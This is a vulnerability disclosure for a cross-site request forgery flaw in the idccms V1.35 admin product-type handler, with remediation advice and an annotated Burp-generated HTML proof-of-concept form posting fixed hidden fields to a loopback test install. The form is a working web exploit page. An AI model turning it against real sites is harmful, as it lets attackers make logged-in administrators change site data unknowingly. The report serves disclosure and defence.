
csrf.md


Target: http://idccms.com/ (version: V1.35)

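idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability in the component http://127.0.0.1:80/admin/idcProType_deal.php?mudi=add&nohrefStr=close (the address is a loopback test installation). The request reproduced below carries only fixed field values and no anti-CSRF token, so the remediation is server-side: require and verify an unpredictable per-session token on this POST handler, and set the SameSite attribute on the admin session cookie as defence in depth.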

POC:

<!--
  Proof-of-concept page from the report: a plain HTML form that POSTs to the
  idccms admin endpoint idcProType_deal.php (query string mudi=add) on a
  loopback test instance. The form has no enctype attribute, so it is sent as
  application/x-www-form-urlencoded, a form submission that needs no CORS
  preflight. Nothing on the page submits the form automatically; the only
  trigger is the submit button at the end.
  Reviewer takeaway: every field below is a fixed string and none is a
  per-session anti-CSRF token, so a handler that verified such a token would
  reject this request.
  NOTE(review): whether the handler checks Origin/Referer, and which SameSite
  value the admin session cookie uses, is not visible on this page; confirm
  against the server before rating impact.
-->
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <!-- Replaces the URL shown in the address bar with "/" through the History API; no navigation takes place. -->
  <script>history.pushState('', '', '/')</script>
    <!-- Target is the "add" action of the product-type handler; the host is 127.0.0.1:80, i.e. the reporter's local install. -->
    <form action="http://127.0.0.1:80/admin/idcProType_deal.php?mudi=add&nohrefStr=close" method="POST">
      <!-- Record identity and type fields; dataTypeCN is stored here in percent-encoded form. -->
      <input type="hidden" name="dataID" value="0" />
			<input type="hidden" name="dataTypeCN" value="IDC%E5%95%86%E5%93%81%E7%B1%BB%E5%88%AB" />
			<input type="hidden" name="dataType" value="" />
			<input type="hidden" name="dataMode" value="" />
			<input type="hidden" name="dataModeStr" value="" />
			<!-- backURL is a percent-encoded URL pointing at admin/idcProType.php on the same loopback host. -->
			<input type="hidden" name="backURL" value="http%3A%2F%2F127.0.0.1%2Fadmin%2FidcProType.php%3Fmudi%3Dmanage%26dataMode%3D%26dataModeStr%3D%26dataType%3D%26dataTypeCN%3DIDC%25E5%2595%2586%25E5%2593%2581%25E7%25B1%25BB%25E5%2588%25AB%26dataType2%3D%26dataID%3D0%26menuID%3D915" />
			<!-- "theme" carries the value "cs"; presumably the name of the category being created (TODO confirm against the admin form). -->
			<input type="hidden" name="theme" value="cs" />
			<input type="hidden" name="oldFatID" value="0" />
			<input type="hidden" name="fatID" value="" />
			<input type="hidden" name="webKey" value="" />
			<input type="hidden" name="webDesc" value="" />
			<input type="hidden" name="mode" value="0" />
			<input type="hidden" name="isHome" value="1" />
			<input type="hidden" name="homeColor" value="" />
			<input type="hidden" name="homeNum" value="10" />
			<input type="hidden" name="isHomeWap" value="1" />
			<input type="hidden" name="homeWapNum" value="10" />
			<input type="hidden" name="fieldNum" value="0" />
			<!-- Twelve repeated groups follow (fieldJudN, fieldNameN, fieldColorN, fieldHomeN, fieldRankN, fieldWidthN, fieldAlignN), all with static values; only fieldRankN changes, in steps of 10. -->
			<input type="hidden" name="fieldJud1" value="1" />
			<input type="hidden" name="fieldName1" value="" />
			<input type="hidden" name="fieldColor1" value="" />
			<input type="hidden" name="fieldHome1" value="1" />
			<input type="hidden" name="fieldRank1" value="10" />
			<input type="hidden" name="fieldWidth1" value="" />
			<input type="hidden" name="fieldAlign1" value="center" />
			<input type="hidden" name="fieldJud2" value="1" />
			<input type="hidden" name="fieldName2" value="" />
			<input type="hidden" name="fieldColor2" value="" />
			<input type="hidden" name="fieldHome2" value="1" />
			<input type="hidden" name="fieldRank2" value="20" />
			<input type="hidden" name="fieldWidth2" value="" />
			<input type="hidden" name="fieldAlign2" value="center" />
			<input type="hidden" name="fieldJud3" value="1" />
			<input type="hidden" name="fieldName3" value="" />
			<input type="hidden" name="fieldColor3" value="" />
			<input type="hidden" name="fieldHome3" value="1" />
			<input type="hidden" name="fieldRank3" value="30" />
			<input type="hidden" name="fieldWidth3" value="" />
			<input type="hidden" name="fieldAlign3" value="center" />
			<input type="hidden" name="fieldJud4" value="1" />
			<input type="hidden" name="fieldName4" value="" />
			<input type="hidden" name="fieldColor4" value="" />
			<input type="hidden" name="fieldHome4" value="1" />
			<input type="hidden" name="fieldRank4" value="40" />
			<input type="hidden" name="fieldWidth4" value="" />
			<input type="hidden" name="fieldAlign4" value="center" />
			<input type="hidden" name="fieldJud5" value="1" />
			<input type="hidden" name="fieldName5" value="" />
			<input type="hidden" name="fieldColor5" value="" />
			<input type="hidden" name="fieldHome5" value="1" />
			<input type="hidden" name="fieldRank5" value="50" />
			<input type="hidden" name="fieldWidth5" value="" />
			<input type="hidden" name="fieldAlign5" value="center" />
			<input type="hidden" name="fieldJud6" value="1" />
			<input type="hidden" name="fieldName6" value="" />
			<input type="hidden" name="fieldColor6" value="" />
			<input type="hidden" name="fieldHome6" value="1" />
			<input type="hidden" name="fieldRank6" value="60" />
			<input type="hidden" name="fieldWidth6" value="" />
			<input type="hidden" name="fieldAlign6" value="center" />
			<input type="hidden" name="fieldJud7" value="1" />
			<input type="hidden" name="fieldName7" value="" />
			<input type="hidden" name="fieldColor7" value="" />
			<input type="hidden" name="fieldHome7" value="1" />
			<input type="hidden" name="fieldRank7" value="70" />
			<input type="hidden" name="fieldWidth7" value="" />
			<input type="hidden" name="fieldAlign7" value="center" />
			<input type="hidden" name="fieldJud8" value="1" />
			<input type="hidden" name="fieldName8" value="" />
			<input type="hidden" name="fieldColor8" value="" />
			<input type="hidden" name="fieldHome8" value="1" />
			<input type="hidden" name="fieldRank8" value="80" />
			<input type="hidden" name="fieldWidth8" value="" />
			<input type="hidden" name="fieldAlign8" value="center" />
			<input type="hidden" name="fieldJud9" value="1" />
			<input type="hidden" name="fieldName9" value="" />
			<input type="hidden" name="fieldColor9" value="" />
			<input type="hidden" name="fieldHome9" value="1" />
			<input type="hidden" name="fieldRank9" value="90" />
			<input type="hidden" name="fieldWidth9" value="" />
			<input type="hidden" name="fieldAlign9" value="center" />
			<input type="hidden" name="fieldJud10" value="1" />
			<input type="hidden" name="fieldName10" value="" />
			<input type="hidden" name="fieldColor10" value="" />
			<input type="hidden" name="fieldHome10" value="1" />
			<input type="hidden" name="fieldRank10" value="100" />
			<input type="hidden" name="fieldWidth10" value="" />
			<input type="hidden" name="fieldAlign10" value="center" />
			<input type="hidden" name="fieldJud11" value="1" />
			<input type="hidden" name="fieldName11" value="" />
			<input type="hidden" name="fieldColor11" value="" />
			<input type="hidden" name="fieldHome11" value="1" />
			<input type="hidden" name="fieldRank11" value="110" />
			<input type="hidden" name="fieldWidth11" value="" />
			<input type="hidden" name="fieldAlign11" value="center" />
			<input type="hidden" name="fieldJud12" value="1" />
			<input type="hidden" name="fieldName12" value="" />
			<input type="hidden" name="fieldColor12" value="" />
			<input type="hidden" name="fieldHome12" value="1" />
			<input type="hidden" name="fieldRank12" value="120" />
			<input type="hidden" name="fieldWidth12" value="" />
			<input type="hidden" name="fieldAlign12" value="center" />
			<!-- Remaining record attributes (pricing, notes, page name, ordering and state flags), again all static. -->
			<input type="hidden" name="priceType" value="" />
			<input type="hidden" name="tixing" value="" />
			<input type="hidden" name="upImgStr" value="" />
			<input type="hidden" name="note" value="" />
			<input type="hidden" name="htmlNameOld" value="" />
			<input type="hidden" name="htmlName" value="" />
			<input type="hidden" name="rank" value="395" />
			<input type="hidden" name="state" value="1" />
			<input type="hidden" name="wapState" value="1" />
			<input type="hidden" name="x" value="0" />
			<input type="hidden" name="y" value="0" />
      <!-- The request is sent only when this button is activated. -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>